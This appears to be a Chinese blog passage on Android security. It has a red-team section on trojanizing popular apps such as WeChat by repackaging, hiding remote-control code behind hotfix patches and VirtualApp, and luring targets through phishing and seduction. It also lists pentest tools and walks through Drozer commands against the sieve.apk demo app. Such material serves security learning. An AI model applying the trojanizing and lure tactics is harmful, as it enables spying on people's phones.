簽名校驗(yàn)、模擬器檢測(cè)、hook檢測(cè)、root檢測(cè)：梆梆：https://bbs.pediy.com/thread-223141.htm

加固

業(yè)務(wù)場(chǎng)景加固（安全鍵盤、防拷貝、防截圖）

Java 源碼加固（華為方舟Java2C）：https://zhuanlan.zhihu.com/openarkcompiler

Dex 加固

? ? ? ? 整體型：https://github.com/guanchao/apk_auto_enforce

? ? ? ? 抽取型：http://www.520monkey.com/archives/1118

? ? ? ? Dex2C：https://bbs.pediy.com/thread-253987.htm

? ? ? ? VMP：https://github.com/chago/ADVMP

so 加固

? ? ? ? 節(jié)加密、函數(shù)加密、動(dòng)態(tài)注冊(cè)、hook重定向：https://github.com/guanchao/AppProtect

? ? ? ? 自定義 linker：https://bbs.pediy.com/thread-225798.htm

內(nèi)存免殺技術(shù)：重打包、VA、Hotfix

直接送個(gè)apk給對(duì)方，讓對(duì)方安裝，還是難度頗大。

有簡(jiǎn)單的方式就是拿市面上的大廠App解包之后，安插進(jìn)自己的代碼，重打包，然后可以：

• 創(chuàng)造機(jī)會(huì)讓對(duì)方下載，比如公司規(guī)定安裝某銀行的手機(jī)客戶端，郵件里還附上了apk，對(duì)方大概率會(huì)下載安裝；
• 或者有機(jī)會(huì)接觸對(duì)方手機(jī)的話，直接就把他原來(lái)的微信卸載了，裝上自己重打包的微信；你的代碼就跑在微信里，所有的權(quán)限都繼承自微信，那其實(shí)他在攻擊者眼中就沒(méi)有秘密了。

其實(shí)重打包做免殺的技術(shù)已經(jīng)廣泛應(yīng)用在山寨App的黑色產(chǎn)業(yè)鏈之中了，他們的盈利方式是通過(guò)往熱門應(yīng)用“插包”、“重打包”的方式，植入廣告劫持模塊進(jìn)行刷量作弊，當(dāng)正常用戶被誘導(dǎo)安裝使用了這些真假難辨的山寨應(yīng)用后，即可實(shí)現(xiàn)對(duì)廣告主的，以為自己在正常使用App，其實(shí)是在瘋狂點(diǎn)擊廣告，實(shí)現(xiàn)對(duì)正規(guī)廣告主的”薅羊毛”行為。

想要將遠(yuǎn)控、或上傳等代碼隱藏好，實(shí)現(xiàn)不落地加載的話，可以將核心邏輯不要直接重打包進(jìn)包里，而是做個(gè)hotfix，等App執(zhí)行一段時(shí)間之后，再通過(guò)下發(fā)補(bǔ)丁包，讓已安裝的客戶端來(lái)執(zhí)行遠(yuǎn)控代碼。

得益于安卓平臺(tái)的開(kāi)放性，熱修復(fù)在安卓平臺(tái)幾乎無(wú)所不能，可以修復(fù)資源文件、修復(fù)代碼（類、方法等），甚至連so庫(kù)都可以修復(fù)，常用的框架有阿里系的AndFix、Hotfix，騰訊系的Tinker、QFix，還有美團(tuán)的等等。

這些本應(yīng)用于動(dòng)態(tài)修復(fù)bug、免重安裝修復(fù)bug的熱修復(fù)框架，到了紅隊(duì)手中也是搖身一變，就好比張小泉的菜刀，切菜好用，搖身一變就是“中國(guó)菜刀”。

最后再介紹一種動(dòng)態(tài)掩蓋特征的方法，那就是用VA來(lái)“加固”，VA等多開(kāi)工具將安卓系統(tǒng)與VA內(nèi)的應(yīng)用隔離，使得應(yīng)用的靜態(tài)特征被動(dòng)態(tài)掩蓋，目前己有廣泛的惡意應(yīng)用使用VA對(duì)自身重打包，重打包后的應(yīng)用包名、軟件名與原應(yīng)用不同，從而逃過(guò)靜態(tài)查殺。

等到VA運(yùn)行時(shí)，可以解密惡意應(yīng)用Apk，通過(guò)反射等技術(shù)欺騙安卓系統(tǒng)來(lái)運(yùn)行未安裝在系統(tǒng)中的Apk，到這一步就跟正常的App無(wú)異了，這方面也有一篇詳細(xì)的文章：《VirtualApp技術(shù)黑產(chǎn)利用研究報(bào)告》。

VA的本質(zhì)就跟Windows平臺(tái)上的殼技術(shù)差不多，先于惡意應(yīng)用前運(yùn)行，瞞過(guò)殺軟之后，再將惡意應(yīng)用釋放出來(lái)運(yùn)行。

加載器：社工、水坑、釣魚(yú)、引流

payload功能實(shí)現(xiàn)了，做了加密和混淆加固了，核心邏輯做了熱補(bǔ)丁動(dòng)態(tài)下發(fā)(可以到內(nèi)網(wǎng)的小美手機(jī)那里下，前面不是開(kāi)啟了APACHE SERVER么？)，如果目標(biāo)還是不安裝，那一切還是等于零。

其實(shí)前面已經(jīng)說(shuō)了幾種方法，比如偽裝成集團(tuán)IT部分要求大家統(tǒng)一安裝，這也是最常見(jiàn)的社會(huì)工程學(xué)手段，俗稱釣魚(yú)或者水坑，大家經(jīng)常收到這種員工薪酬.xls、員工通訊錄2020版.doc等文件，打開(kāi)即會(huì)釋放宏木馬，攻陷PC，如果此時(shí)企業(yè)App的開(kāi)發(fā)者把開(kāi)發(fā)手機(jī)也連在電腦上，也會(huì)給處于開(kāi)發(fā)者模式的手機(jī)安裝惡意軟件。

也可以直接攻陷集團(tuán)MDM服務(wù)器，直接分發(fā)木馬，見(jiàn)這篇：Hackers breach company’s MDM server to spread Android malware，或者直接想辦法拿到對(duì)方的手機(jī)，這也是直接出擊的社工了，“美人計(jì)”甚至“美男計(jì)”也屬于社工的一部分。兵者、詭道也。

社工的成功率是非常高的，所以大家也會(huì)經(jīng)常受到各種誘導(dǎo)點(diǎn)擊鏈接短信，菠菜、色流等一大堆。不要小看人類最原始的本能欲望，色流在黑產(chǎn)中的應(yīng)用范圍之廣超出想象，前面說(shuō)的時(shí)間管理大師都會(huì)中招。

說(shuō)不定油膩中年老板就喜歡這些妹妹呢？這些照騙確實(shí)讓人把持不住。

總結(jié)：只是開(kāi)始

在ARM設(shè)備武器化指南攻擊篇中，介紹了Kali Nethunter包括Rootless版本和完整版的安裝、使用和簡(jiǎn)單上手實(shí)踐，還有一般木馬、遠(yuǎn)控的免殺思路和方法。

其實(shí)Kali Nethunter的強(qiáng)大之處不僅在于攻擊，在防守方面也照樣“屢立奇功”，比如得益于其定制版內(nèi)核解鎖arm64架構(gòu)的Linux軟件包安裝，可以作為App沙箱和蜜罐，捕獲木馬并進(jìn)行內(nèi)核層面的“降維”攻擊分析。詳細(xì)分析流程和思路敬請(qǐng)期待防守篇。

6、手機(jī)滲透測(cè)試平臺(tái)

類似?nethunter

andrax

介紹

：https://www.freebuf.com/sectool/187100.html

andrax 是一個(gè)?APP，里面整合了一整套滲透測(cè)試實(shí)用程序，是專為Android智能手機(jī)設(shè)計(jì)的滲透測(cè)試平臺(tái)，它可以直接在原生Android系統(tǒng)上運(yùn)行，它不僅能夠跟常用Linux發(fā)行版相媲美，而且它的功能甚至比常見(jiàn)Linux發(fā)行版更加強(qiáng)大。nethunter?需要刷進(jìn)手機(jī)，同時(shí)有的手機(jī)不支持，如果不刷而是使用 ternux 安裝，某些工具因?yàn)楂@取不到root權(quán)限會(huì)出現(xiàn)問(wèn)題。這時(shí)就可以放棄?termux + nethunter?轉(zhuǎn)而使用 andrax。

• ANDRAX 是一款專為Android智能手機(jī)設(shè)計(jì)的滲透測(cè)試平臺(tái)，
• NetHunter 只是一款Debian模擬運(yùn)行工具。

Andrax5 通用版安裝教程，讓你擁有強(qiáng)大的滲透測(cè)試工具：https://zhuanlan.zhihu.com/p/615387221

andrax pentest 高級(jí)專業(yè)黑客安卓滲透測(cè)試工具：https://www.ddosi.org/andrax/

信息收集
? ? ? ? -Whois
? ? ? ? -BindDNS工具
? ? ? ? -Dnsrecon
? ? ? ? -Raccoon
? ? ? ? -DNS-Cracker
? ? ? ? -Firewalk
網(wǎng)絡(luò)掃描
? ? ? ? -Nmap– 網(wǎng)絡(luò)映射工具
? ? ? ? -Masscan
? ? ? ? -SSLScan
? ? ? ? -Amap
數(shù)據(jù)包制作
? ? ? ? -Hping3
? ? ? ? -Nping
? ? ? ? -Scapy
? ? ? ? -Hexinject
? ? ? ? -Ncat
? ? ? ? -Socat
網(wǎng)絡(luò)攻擊
? ? ? ? -ARPSpoof
? ? ? ? -Bettercap
? ? ? ? -MITMProxy
? ? ? ? -EvilGINX2
網(wǎng)站入侵
? ? ? ? -0d1n
? ? ? ? -Wapiti3
? ? ? ? -Recon-NG
? ? ? ? -PHPSploit
? ? ? ? -Photon
? ? ? ? -XSSer
? ? ? ? -Commix
? ? ? ? -SQLMap
? ? ? ? -Payloadmask
? ? ? ? -AbernathY-XSS
密碼破解
? ? ? ? -Hydra
? ? ? ? -Ncrack
? ? ? ? -JohnThe Ripper
? ? ? ? -CRUNCH
? ? ? ? 無(wú)線攻擊
? ? ? ? -VMPEvil AP
? ? ? ? -Aircrack-NGTools
? ? ? ? -Cowpatty
? ? ? ? -MDK3
? ? ? ? -Reaver
漏洞利用
? ? ? ? -MetaSploitFramework
? ? ? ? -RouterSploitFramework
? ? ? ? -Getsploit
? ? ? ? -OWASPZSC
? ? ? ? -Rop-TOOL
等等等等…….

MetaSploit Framework（漏洞利用框架）
Jaeles（web漏掃器）
Nuclei（輕量級(jí)漏洞利用）
OWASP-ZAP（web漏掃器）
Hydra（在線pj器）
John The Ripper（離線pj器）
Aircrack-NG（wifi漏洞利用集）
CrackMapExec（域環(huán)境滲透瑞士軍刀）
Empire（后滲透測(cè)試神器）
EvilSSDP（欺騙 SSDP）
RouterSploit Framework（專注于家用路由器的漏洞利用框架）
PRET Framework(打印機(jī)開(kāi)發(fā)工具包)
Singularity DNS Rebinding Framework(DNS重新綁定攻擊工具)
DNSteal(DNS傳輸文件工具)
Radare2（二進(jìn)制分析框架）
EvilGINX2（網(wǎng)絡(luò)釣魚(yú)框架）
EnodeB-HACK(基站漏洞利用)
ICSSPLOIT（工控系統(tǒng)漏洞利用）
BIRP （Big Iron Recon & PWN）（評(píng)估通過(guò)TN3270服務(wù)的大型機(jī)應(yīng)用程序的安全性）
QrlJacker（二維碼劫持攻擊框架）
Katana-DS（自動(dòng)執(zhí)行Google Hacking / Dorking）
OWASP Tools
Maltego（可視化威脅建模）
Raccoon（ 信息收集工具）
Scapy（交互式數(shù)據(jù)包處理工具）
Bettercap（ 輕量級(jí)MiTM 框架）
頂級(jí)ANDRAX工具速覽_漏洞利用_26
Vulnx（自動(dòng)檢測(cè)多種CMS漏洞的程序）
頂級(jí)ANDRAX工具速覽_OWASP_27
EAPHammer（一款針對(duì)WPA2企業(yè)網(wǎng)絡(luò)環(huán)境的Evil Twin攻擊測(cè)試工具）

高級(jí)終端。該工具還提供了高級(jí)且專業(yè)的終端模擬器：

動(dòng)態(tài)分類(DCO)。美化的工具分類系統(tǒng)：

高級(jí)IDE。支持多種編程語(yǔ)言：

Andrax5 通用版安裝教程

手機(jī)需要 root。：https://gitlab.com/crk-mythical/andrax-hackers-platform-v5-2

7、Android?的?app?滲透測(cè)試

移動(dòng)端滲透測(cè)試工具相比豐富的web端真的是少之又少，drozer?就是移動(dòng)端的一個(gè)工具。

ADB Shell 命令幫助：https://adbshell.com/downloads

adb 快速導(dǎo)出安卓安裝包
查看手機(jī)中已安裝的所有 apk 文件
adb shell pm list package
根據(jù)要導(dǎo)出的 app 包名，查看 APP 安裝路徑
adb shell pm path com.DeviceTest
根據(jù)以上路徑導(dǎo)出 apk 源文件到 PC 端
adb pull /xxx/xxx/xxx.apk C:\PC路徑\desktop\

APP安全性測(cè)試的工具

1. Quick Android Review Kit

由領(lǐng)英開(kāi)發(fā)的一款靜態(tài)代碼分析工具，是開(kāi)源的。它可以提供有關(guān) Android App 安全威脅的信息，并提供有關(guān)安全漏洞的完整信息。它可以生成有關(guān)潛在漏洞的報(bào)告，并提供一些解決辦法，它還能突出顯示與 Android 版本有關(guān)的安全問(wèn)題。此外，它能掃描移動(dòng) App 中的所有元素，查找安全威脅。

2. Zed Attack Proxy：https://www.zaproxy.org/

它是全球最受歡迎的免費(fèi)安全測(cè)試工具之一，它易于安裝、支持多種腳本語(yǔ)言類型，還能提供 20 種不同語(yǔ)言的版本。在軟件開(kāi)發(fā)和測(cè)試階段，ZAP 可以自動(dòng)識(shí)別 App 中的安全漏洞。

3. Drozer(MWR InfoSecurity)：https://github.com/WithSecureLabs/drozer

它是由 MWR InfoSecurity 開(kāi)發(fā)的 App 安全測(cè)試框架，幫助開(kāi)發(fā)者確定 Android 設(shè)備中的安全漏洞。它是一個(gè)開(kāi)源工具，可同時(shí)支持真實(shí)的 Android 設(shè)備和模擬器，而且能在很短的時(shí)間內(nèi)評(píng)估與 Android 安全相關(guān)的復(fù)雜性。

4. MobSF(Mobile Security Framework)：https://github.com/MobSF/Mobile-Security-Framework-MobSF

這是一款開(kāi)源的自動(dòng)化移動(dòng) App 安全測(cè)試工具，適用于 iOS 和 Android，能對(duì) Android、iOS、Windows 的移動(dòng) App 進(jìn)行更快的安全性分析。它還可以熟練執(zhí)行動(dòng)態(tài)、靜態(tài)分析和 Web API 測(cè)試。它可以托管在本地環(huán)境，因此機(jī)密數(shù)據(jù)不會(huì)與云交互。同時(shí)，開(kāi)發(fā)人員可以在開(kāi)發(fā)階段識(shí)別出安全漏洞。

5. Android Debug Bridge：https://source.android.google.cn/docs/setup/build/adb?hl=zh-cn

它是用于專門與運(yùn)行 Android 設(shè)備進(jìn)行通信的命令行移動(dòng)應(yīng)用程序測(cè)試工具。

它提供了一個(gè)終端接口，用于控制使用 USB 連接到計(jì)算機(jī)的 Android 設(shè)備。ADB 可用于安裝 / 卸載應(yīng)用程序、運(yùn)行 Shell 命令、重啟、傳輸文件等。并且，可以使用此類命令輕松還原 Android 設(shè)備。ADB可輕松與谷歌的 Android Studio 集成開(kāi)發(fā)環(huán)境進(jìn)行集成，它還可以實(shí)時(shí)監(jiān)控系統(tǒng)事件，允許使用 Shell 命令在系統(tǒng)級(jí)別進(jìn)行操作。

6. Micro Focus(Fortify)：https://www.microfocus.com/zh-cn/home

它可以被安裝到移動(dòng)設(shè)備前保護(hù)移動(dòng) App 的安全，而且，它支持各種平臺(tái)，有助于識(shí)別跨網(wǎng)絡(luò)、服務(wù)器和客戶端的安全漏洞。Fortify 使用靈活的交付模型執(zhí)行端到端測(cè)試，其安全測(cè)試包括靜態(tài)代碼分析和針對(duì)移動(dòng) App 的掃描，并能給出準(zhǔn)確結(jié)果。

7. CodifiedSecurity：https://codifiedsecurity.com/

它是一款著名的自動(dòng)化移動(dòng) App 安全測(cè)試工具。它可以發(fā)現(xiàn)并修復(fù)安全漏洞，提供實(shí)時(shí)反饋，并確保開(kāi)發(fā)者足夠安全地使用移動(dòng)應(yīng)用程序。它支持 Android 和 iOS 平臺(tái)，也支持靜態(tài)測(cè)試和動(dòng)態(tài)測(cè)試，還可以在不獲取源代碼的情況下測(cè)試移動(dòng) App。它遵循用于安全測(cè)試的程序化方法，該方法可確保測(cè)試結(jié)果是可靠的。

8. WhiteHat Security

它是基于云的安全平臺(tái)，并使用其靜態(tài)和動(dòng)態(tài)技術(shù)提供快速的解決方案。它已經(jīng)被 Gartner 認(rèn)可為安全測(cè)試的領(lǐng)導(dǎo)者，并贏得了多個(gè)獎(jiǎng)項(xiàng)。WhiteHat Sentinel 通過(guò)在真實(shí)設(shè)備上安裝移動(dòng) App 進(jìn)行測(cè)試，無(wú)需模擬器，它支持 iOS 和 Android 平臺(tái)，可提供有關(guān)項(xiàng)目狀況的完整信息。

9. Kiuwan

它提供領(lǐng)先的技術(shù)覆蓋范圍，可對(duì)移動(dòng) App 進(jìn)行360°的安全性測(cè)試。它包括靜態(tài)代碼分析和軟件組成分析，以及軟件開(kāi)發(fā)生命周期的自動(dòng)化

10. Veracode

Veracode 向全球客戶提供移動(dòng)應(yīng)用程序安全性服務(wù)。

drozer

Drozer 是一個(gè) Android 安全測(cè)試框架：https://github.com/WithSecureLabs/drozer

其官方文檔說(shuō)道："Drozer允許你以一個(gè)普通android應(yīng)用的身份與其他應(yīng)用和操作系統(tǒng)交互"。Drozer是一種交互式的安全測(cè)試工具，使用Drozer進(jìn)行安全測(cè)試時(shí)，用戶在自己的電腦上輸入命令，Drozer會(huì)將命令發(fā)送到Android設(shè)備上的代理程序執(zhí)行，從而來(lái)搜索應(yīng)用程序和設(shè)備中的安全漏洞。

實(shí)際上 Drozer 的核心功能就是通過(guò)分析 AndroidManifest.xml，看四大組件中有沒(méi)有可 export 的，如果有那么就進(jìn)一步檢測(cè)這些可導(dǎo)出的組件是不是存在相應(yīng)的安全問(wèn)題。

Android 系統(tǒng)的組件共有四種，其主要用途分別為：

• Activity (?界面)：應(yīng)用程序中，一個(gè)Activity通常就是一個(gè)單獨(dú)的屏幕(或者頁(yè)面)，是用戶操作的可視化界面，一個(gè)應(yīng)用程序一般由多個(gè) Activity 組成，是最常見(jiàn)的組件。它上面可以顯示一些控件也可以監(jiān)聽(tīng)并處理用戶的事件做出響應(yīng)。 Activity之間通過(guò) Intent 進(jìn)行通信。在Intent的描述結(jié)構(gòu)中，有兩個(gè)最重要的部分：動(dòng)作和動(dòng)作對(duì)應(yīng)的數(shù)據(jù)。
• Service (服務(wù))：沒(méi)有用戶界面的程序，通常用作在后臺(tái)處理耗時(shí)的邏輯。常見(jiàn)于監(jiān)控類應(yīng)用
• Content Provider (數(shù)據(jù))：內(nèi)容(數(shù)據(jù))提供者，在多個(gè)APP間共享數(shù)據(jù)，比如通訊錄
• Broadcast Receiver (廣播)：在應(yīng)用程序之間傳輸信息的機(jī)制，分為接收與發(fā)送。注冊(cè)特定事件，并在其發(fā)生時(shí)被激活

對(duì)于四種組件，需要關(guān)注的點(diǎn)就是?是否允許其他應(yīng)用隨意調(diào)用

• android:exported 屬性
  該屬性指明了是否支持其它應(yīng)用調(diào)用當(dāng)前組件。
  Activity、Service、Broadcast 默認(rèn)值：
  如果包含有 intent-filter 默認(rèn)值為 true，表示其他 Application 可調(diào)用該組件;
  沒(méi)有 intent-filter 默認(rèn)值為 false，表示其只能被當(dāng)前 Application 或者擁有同樣 USER ID 的 Application 的調(diào)用。
  Provider 默認(rèn)值：
  當(dāng) Android sdk 的最小版本為 16 或者更低時(shí)其默認(rèn)值為 true。如果是 17 及以上的版本默認(rèn)值為 false。
  當(dāng)組件的 android:exported="true" 時(shí)，會(huì)導(dǎo)致其他應(yīng)用可隨意調(diào)用該組件(直接調(diào)用或者通過(guò) action 調(diào)用)，那么勢(shì)必會(huì)導(dǎo)致一些問(wèn)題。
• android:permission

組件導(dǎo)出作用、危害

• 什么是組件導(dǎo)出？簡(jiǎn)而言之，就是別的APP也可以訪問(wèn)這個(gè)組件。再總而言之，就是組件權(quán)限的控制。
• 組件導(dǎo)出有什么用？有些APP的功能需要提供一些接口給其它APP訪問(wèn)，就需要把相關(guān)的接口功能放在一個(gè)導(dǎo)出的組件上。
• 組件導(dǎo)出有什么危害？因?yàn)闄?quán)限聲明是以組件為單位的，A組件調(diào)用B組件的功能來(lái)訪問(wèn)操作系統(tǒng)API時(shí)，適用于B組件的權(quán)限聲明。如果B作為導(dǎo)出組件，沒(méi)有進(jìn)行嚴(yán)格的訪問(wèn)控制，那么A就可以通過(guò)調(diào)用B來(lái)訪問(wèn)原本沒(méi)有聲明權(quán)限的功能，構(gòu)成本地權(quán)限提升。

最新的drozer(版本3.0.1)無(wú)法在 Windows 上運(yùn)行，必須在 虛擬機(jī)(推薦Kali、Ubuntu) 或 Docker?容器 (?容器和基本設(shè)置：https://hub.docker.com/r/withsecurelabs/drozer) 運(yùn)行 drozer。

這里選擇?kali?虛擬機(jī)上運(yùn)行?drozer

從 github下載最新版本drozer的whl包并安裝?：sudo pip install drozer-<version>.whl

linux?安裝?adb：apt-get install android-tools-adb

手機(jī)安裝?drozer-agent.apk

可以安裝在 實(shí)體安卓手機(jī)上(使用USB連接PC)，也可以安裝在模擬器

下載?drozer-agent.apk：https://github.com/WithSecureLabs/drozer-agent/releases/latest

直接下載?drozer-agent.apk?并安裝，或者通過(guò) adb?安裝：adb install drozer-agent.apk

安裝成功后運(yùn)行 drozer-agent，確保右下角按鈕顯示為 "開(kāi)啟"。

通過(guò)網(wǎng)絡(luò)連接到安卓手機(jī)

最簡(jiǎn)單的方法就是 "目標(biāo)手機(jī)和PC在同一網(wǎng)段"。?drozer代理在安卓設(shè)備上運(yùn)行，并且嵌入式服務(wù)器已經(jīng)啟動(dòng)。

如果使用 docker?則執(zhí)行：docker run --net host -it --entrypoint sh withsecurelabs/drozer

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?#?docker run --net host -it withsecurelabs/drozer

? ? ? ? ? ? ? ? ? ? 獲取容器中 shell（例如，通過(guò) drozer?從安卓手機(jī)上查看、下載 文件）

最后，執(zhí)行 drozer 命令連接到手機(jī)： drozer console connect --server <phone IP address>

通過(guò)USB連接到手機(jī)

如果網(wǎng)絡(luò)通信受到限制，則可以通過(guò)?數(shù)據(jù)線?把手機(jī)連接到電腦上。然后電腦上使用 adb 端口轉(zhuǎn)發(fā)功能從而實(shí)現(xiàn)PC和手機(jī)的通信。adb forward?用法：adb forward?LOCAL REMOTE。端口轉(zhuǎn)發(fā)：adb forward tcp:31415 tcp:31415? ?作用是將PC端 31415 端口的數(shù)據(jù)轉(zhuǎn)發(fā)到手機(jī)端 31415 端口，從而實(shí)現(xiàn)PC和手機(jī)的通信。

如果使用?docker?則執(zhí)行：docker run --net host -it --entrypoint sh withsecurelabs/drozer

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?#?docker run --net host -it withsecurelabs

運(yùn)行drozer命令連接到手機(jī)： drozer console connect --server localhost

drozer 連接?drozer-agent

手機(jī)?IP：192.168.51.40

Kali?IP：192.168.51.33

在PC(這里是Kali)上使用 drozer?命令連接手機(jī)上的?drozer-agent，

drozer?命令幫助

run? ? ? ? ? ? ? ? 執(zhí)行 drozer 模塊
list? ? ? ? ? ? ? ? ?顯示當(dāng)前會(huì)話中有權(quán)限執(zhí)行的所有drozer模塊的列表。
shell? ? ? ? ? ? ? 在代理進(jìn)程的上下文中，在設(shè)備上啟動(dòng)交互式Linux shell。
cd? ? ? ? ? ? ? ? ? 將特定的命名空間掛載為會(huì)話的根，以避免重復(fù)鍵入模塊的全名。
clean? ? ? ? ? ? ? 刪除Android設(shè)備上drozer存儲(chǔ)的臨時(shí)文件。
contributors? ? 顯示對(duì)drozer框架和系統(tǒng)中使用的模塊做出貢獻(xiàn)的人員列表。
echo? ? ? ? ? ? ? ? 將文本打印到控制臺(tái)。
exit? ? ? ? ? ? ? ? ? 終止 drozer 會(huì)話.
help? ? ? ? ? ? ? ? ?顯示有關(guān)特定命令或模塊的幫助。
load? ? ? ? ? ? ? ? ? 加載一個(gè)包含drozer命令的文件，并按順序執(zhí)行它們。
module? ? ? ? ? ? ?從互聯(lián)網(wǎng)上查找并安裝其他drozer模塊。
permissions?? ? ?顯示授予drozer代理的權(quán)限列表。
set?? ? ? ?在變量中存儲(chǔ)一個(gè)值，該變量將作為環(huán)境變量傳遞給drozer生成的任何Linux shell。
unset?? ? ? ? ?刪除drozer傳遞給它生成的任何Linux shell的命名變量。

使用步驟：

• 首先，使用 list 查看支持哪些模塊；
• 然后，使用 help module_name，或者 run module_name -h 查看各 module 的用法；
• 最后，通過(guò) run module_name module_options 來(lái)對(duì) app 進(jìn)行檢測(cè)。

查看模塊列表：dz> list

獲取app包列表：dz> run app.package.list

獲取?app?信息。包括app版本，在設(shè)備中保存數(shù)據(jù)的位置，安裝的位置，app權(quán)限等。

獲取要檢測(cè)的app的包名：run app.package.list -f <包的關(guān)鍵字>
查看apk基本信息：run app.package.info -a <包名>
識(shí)別攻擊面：run app.package.attacksurface <包名>

攻擊面就是指安卓四大組件(activaty、broadcast 、content?provider、service)?的?export?屬性，如果四大組件中設(shè)置有 export?屬性，就去具有export的組件有沒(méi)有問(wèn)題。

尋找找到攻擊面時(shí)，需要關(guān)注 android 的 IPC 通信機(jī)制的脆弱性，這些特點(diǎn)導(dǎo)致了App泄漏敏感信息給同一臺(tái)設(shè)備上的其它App。APP評(píng)估中4項(xiàng)公共組件漏洞

• 組件Content Provider配置錯(cuò)誤，導(dǎo)致數(shù)據(jù)泄漏
• 組件Activity配置錯(cuò)誤，導(dǎo)致登錄頁(yè)面被繞過(guò)
• 組件Service配置錯(cuò)誤，導(dǎo)致非法權(quán)限提升
• 組件Broadcast Receiver配置錯(cuò)誤，導(dǎo)致拒絕服務(wù)、非法越權(quán)

攻擊面

run app.package.list -f 關(guān)鍵字 ? ? ? ? ? ? ? ? ? ?搜索包含關(guān)鍵字的包名
run app.package.info -a com.xxx.xxx ? ? ? ? ? ? ? 獲取app的基本信息

run app.package.attacksurface com.xxx.xxx ? ? ? ? 確定攻擊面
run app.activity.info -a com.xxx.xxx ? ? ? ? ? ? ?獲取activity信息
run app.activity.start --component com.xxx.xxx ? ?啟動(dòng)activity
help app.activity.start
run app.provider.info -a com.xxx.xxx ? ?獲取Content Provider信息

根據(jù)具體的攻擊面進(jìn)行攻擊

啟動(dòng)暴露的activity
run app.activity.start--component (package name) (component name)

啟動(dòng)暴露的broadcast
run app.broadcast.start --component (package name) (component name)

啟動(dòng)暴露的provider
run app.provider.query--content://com.mwr.example.sieve.DBContentProvider/Passwords

啟動(dòng)暴露的service
run app.service.start --component (package name) (component name)

經(jīng)過(guò)這些操作之后就成功滲透進(jìn)入app的內(nèi)部了。后面可以根據(jù)實(shí)際情況繼續(xù)深入。
比如：sql注入就屬于內(nèi)容攻擊的層面，這個(gè)時(shí)候我們?cè)诿鞔_了內(nèi)容暴露之后進(jìn)行如下的攻擊：

1.檢測(cè)四大組件安全 ?：
? ? ? ? ? ? ? ? 查看 activity 組件信息：run app.activity.info -a?<包名>
? ? ? ? ? ? ? ? 查看 broadcast 組件信息：run app.broadcast.info -a ?<包名>
? ? ? ? ? ? ? ? 查看 service 組件信息：run app.service.info -a <包名>
? ? ? ? ? ? ? ? 查看 content provider 組件信息： run app.provider.info -a <包名>

2.檢測(cè) URI 數(shù)據(jù)泄露風(fēng)險(xiǎn)：
? ? ? ? ? ? ? ? Drozer的scanner模塊提供了一些方法去猜測(cè)可能存在的content URIs.
? ? ? ? ? ? ? ? run scanner.provider.finduris -a <包名>

3.檢測(cè)文件遍歷漏洞 :
? ? ? ? ? ? Scanner模塊提供一些方法檢測(cè)本地Content Provider數(shù)據(jù)是否有文件遍歷漏洞風(fēng)險(xiǎn)
? ? ? ? ? ? 命令：run scanner.provider.traversal -a <包名>

4.檢測(cè)是否存在本地sql注入:
? ? ? ? ? ? Scanner模塊提供一些方法去檢測(cè)本地儲(chǔ)存的SQLite數(shù)據(jù)是否有SQL注入的風(fēng)險(xiǎn)。
? ? ? ? ? ? 命令：run scanner.provider.injection -a <包名>

下載?示例?sieve.apk

Drozer 官網(wǎng)提供了一個(gè)用于漏洞測(cè)試的 Demoapk 程序 sieve.apk，下載安裝到手機(jī)（USB連接實(shí)體測(cè)試機(jī)到PC）：https://github.com/as0ler/Android-Examples

流程：APP第一次打開(kāi)后，主頁(yè)要求設(shè)置訪問(wèn)密碼(com.mwr.example.sieve.MainLoginActivity)。驗(yàn)證成功后進(jìn)入下一級(jí)頁(yè)面 (com.mwr.example.sieve.PWList) 查看密碼。

執(zhí)行命令 run app.package.list -f sieve? ? 搜索關(guān)鍵詞 sieve?獲取具體包名

執(zhí)行命令 run app.package.info -a com.mwr.example.sieve，獲取 sieve 應(yīng)用的版本、數(shù)據(jù)存儲(chǔ)目錄、用戶ID、權(quán)限等基本信息

行命令 run app.package.attacksurface 包名，識(shí)別出應(yīng)用的攻擊面

Drozer會(huì)告訴我們應(yīng)用是否有 export 可導(dǎo)出得暴露的組件，注意到services下面提示isdebuggle?說(shuō)明是可調(diào)試，這意味著可以附加一個(gè)調(diào)試器到這個(gè)進(jìn)程。

activity 越權(quán)

Activity是Android組件中最基本也是最為常見(jiàn)用的四大組件之一，是一個(gè)負(fù)責(zé)與用戶交互的組件。

APP應(yīng)用中主活動(dòng)（比如MainLoginActivity）是app啟動(dòng)時(shí)的主界面，必須可以導(dǎo)出，但其他 Activity 正常情況下是不能導(dǎo)出的，遇到可導(dǎo)出且不需要權(quán)限的 Activity 活動(dòng)組件，可以用 Drozer 命令來(lái)嘗試直接啟動(dòng)該活動(dòng)，往往可以發(fā)現(xiàn)越權(quán)訪問(wèn)（如繞過(guò)登錄驗(yàn)證訪問(wèn)數(shù)據(jù)）的漏洞。

執(zhí)行命令 run app.activity.info -a com.mwr.example.sieve，可查看APP對(duì)外的 activity 組件信息：

發(fā)現(xiàn)3個(gè)activity 被導(dǎo)出，而且不要求任何權(quán)限，那么就讓 drozer 來(lái)加載它。執(zhí)行命令 run app.activity.start --component 包名 活動(dòng)組件名）直接調(diào)用查看密碼的 Activity ，從而實(shí)現(xiàn)繞過(guò)登錄驗(yàn)證功能，越權(quán)查看密碼。至此，成功借助 Drozer 繞過(guò)登錄授權(quán)驗(yàn)證，造成 Activity組件的越權(quán)訪問(wèn)漏洞。（沒(méi)繞過(guò)的話，打開(kāi) sieve 時(shí)是需要我們輸入密碼才能登錄到此界面的）

Intent?負(fù)責(zé)Activity間的通信

intent 組件觸發(fā)（拒絕服務(wù)、權(quán)限提升）。利用 intent 對(duì)組件的觸發(fā)一般有兩類漏洞，一類是拒絕服務(wù)，一類的權(quán)限提升。拒絕服務(wù)危害性比較低，更多的只是影響應(yīng)用服務(wù)質(zhì)量；而權(quán)限提升將使得沒(méi)有該權(quán)限的應(yīng)用可以通過(guò)intent觸發(fā)擁有該權(quán)限的應(yīng)用，從而幫助其完成越權(quán)行為。

嘗試權(quán)限提升。權(quán)限提升其實(shí)和拒絕服務(wù)很類似，只不過(guò)目的變成構(gòu)造更為完整、更能滿足程序邏輯的 intent。由于activity一般多于用戶交互有關(guān)，所以基于 intent 的權(quán)限提升更多針對(duì) broadcast receiver 和 service。與drozer相關(guān)的權(quán)限提升工具，可以參考IntentFuzzer，其結(jié)合了drozer以及hook技術(shù)，采用 feedback策略進(jìn)行fuzzing。以下僅僅列舉drozer發(fā)送intent的命令：

